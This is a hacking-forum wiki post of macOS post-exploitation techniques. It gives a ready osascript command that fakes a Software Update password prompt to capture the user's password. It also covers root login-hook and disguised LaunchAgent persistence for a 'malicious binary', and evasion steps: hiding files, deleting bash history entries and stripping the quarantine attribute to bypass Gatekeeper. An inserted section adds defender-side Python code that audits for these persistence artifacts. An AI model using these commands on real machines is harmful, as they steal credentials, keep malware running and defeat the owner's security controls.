This post was created as a Wiki allowing it to be a living document updated and maintained by SubHacker.net members.
Getting User Password With OSAScript
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
button returned:OK, text returned:Subhacker R00lz
Login Hook
A login hook tells Mac OS X to execute a script when a user logs in. Unlike Startup Items, which simply open when a user logs in, a login hook is a script that executes as root.
Just run the following command. Note that this modifies the /var/root/Library/Preferences/com.apple.loginwindow file and is a common tactic; as such it is recommended to use the alternative login hook method below to avoid possible IoCs.
defaults write com.apple.loginwindow LoginHook /usr/bin/hook.sh
Alternative Login Hook via /etc/ttys (Mac OS X 10.2.x, 10.3.x, or 10.4.2 or later)
Requires root/wheel access but avoids a commonly used command and file, so it is useful for being a little stealthier.
Look for a line that looks like this:
#console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow" vt100 on secure window=/System/Library/CoreServices/WindowServer onoption="/usr/libexec/getty std.9600"
Add your login hook right after the "loginwindow" text, before the closing double quote. Example:
#console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow -LoginHook /path/to/script" vt100 on secure window=/System/Library/CoreServices/WindowServer onoption="/usr/libexec/getty std.9600"
LaunchAgent Persistence
Create a normal-sounding filename with a .plist extension. In this example we use the filename com.apple.diagnosticsx.plist. Paste the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
The two <string> values need to be updated. The first should reflect your .plist filename minus the .plist extension, and the second is the location of your malicious binary to be executed.
Save the file to /Users/<username>/Library/LaunchAgents/com.apple.diagnosticsx.plist and execute the following command:
/bin/launchctl load -w /Users/<username>/Library/LaunchAgents/com.apple.diagnosticsx.plist
You're good to go. Your malicious binary will now be run, and the "KeepAlive" key ensures that if it ever crashes or is terminated, launchd will automatically run it again. Note that it is good practice to ensure your payload has executable permissions (chmod +x payload).
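A defender-side check for the login-hook and LaunchAgent artifacts described above, added here as an example and not code from the original post: it parses constructed sample inputs (a com.apple.diagnosticsx agent, a com.apple.loginwindow preference carrying LoginHook, and an /etc/ttys loginwindow line) with plistlib and reports each indicator. The user name alice, the payload path and the sample file paths are constructed, not taken from the post.

```python
import plistlib
import re

# Apple's own com.apple.* launch items live here; the same label elsewhere is suspect.
APPLE_DIRS = ("/System/Library/LaunchAgents", "/System/Library/LaunchDaemons")
# A persisted program in a user-writable location is a second warning sign.
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/")

def audit_launch_agent(plist_bytes, plist_path):
    """Return findings for one LaunchAgent/LaunchDaemon plist."""
    data = plistlib.loads(plist_bytes)
    findings = []
    label = data.get("Label", "")
    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_DIRS):
        findings.append("apple-style label outside /System/Library: " + label)
    if data.get("KeepAlive"):
        findings.append("KeepAlive set: launchd restarts the program if it exits")
    args = data.get("ProgramArguments") or []
    program = data.get("Program") or (args[0] if args else "")
    if program.startswith(USER_WRITABLE):
        findings.append("program in user-writable path: " + program)
    return findings

def audit_loginwindow(plist_bytes):
    """Flag a LoginHook key in com.apple.loginwindow preferences."""
    hook = plistlib.loads(plist_bytes).get("LoginHook")
    return ["LoginHook set: " + hook] if hook else []

def audit_ttys(ttys_text):
    """Flag a -LoginHook argument spliced into the loginwindow line of /etc/ttys."""
    return ["/etc/ttys carries " + m.group(0)
            for m in re.finditer(r'-LoginHook\s+[^\s"]+', ttys_text)]

# Constructed samples mirroring the post's artifacts (not captured from a real host).
SAMPLE_AGENT = plistlib.dumps({
    "Label": "com.apple.diagnosticsx",
    "ProgramArguments": ["/Users/alice/Library/.cache/payload"],
    "KeepAlive": True,
})
SAMPLE_AGENT_PATH = "/Users/alice/Library/LaunchAgents/com.apple.diagnosticsx.plist"
SAMPLE_LOGINWINDOW = plistlib.dumps({"LoginHook": "/usr/bin/hook.sh"})
SAMPLE_TTYS = ('console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/'
               'loginwindow -LoginHook /path/to/script" vt100 on secure\n')

def run_audit():
    # Run all three checks over the constructed samples; findings keyed by source.
    return {
        "launch_agent": audit_launch_agent(SAMPLE_AGENT, SAMPLE_AGENT_PATH),
        "loginwindow": audit_loginwindow(SAMPLE_LOGINWINDOW),
        "ttys": audit_ttys(SAMPLE_TTYS),
    }
```

On a live host you would feed the same functions the bytes of each plist under ~/Library/LaunchAgents and the root user's com.apple.loginwindow preferences, plus the text of /etc/ttys, instead of the constructed samples.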
Avoid Spotlight Indexing
Add a file named .metadata_never_index to a directory to keep that directory from being indexed by Spotlight.
Hide Files From GUI View
Use chflags to set the hidden attribute on the file or directory:
$ chflags hidden FILE
Bash History Evasion
Append ; history -d $(history 1) after your command and it will be hidden from the bash history:
$ touch /tmp/toteshidden; history -d $(history 1)
$ ls /tmp/toteshidden
$ history |grep toteshidden
550 ls /tmp/toteshidden
551 history |grep toteshidden
Quarantine Attribute Removal
When a file is downloaded from a remote source using a quarantine-aware application, a quarantine attribute is set on the file, causing Gatekeeper to display a warning and prompt the user for confirmation before launching the file.
The following command will remove this quarantine attribute:
/usr/bin/xattr -d -r com.apple.quarantine <FILE>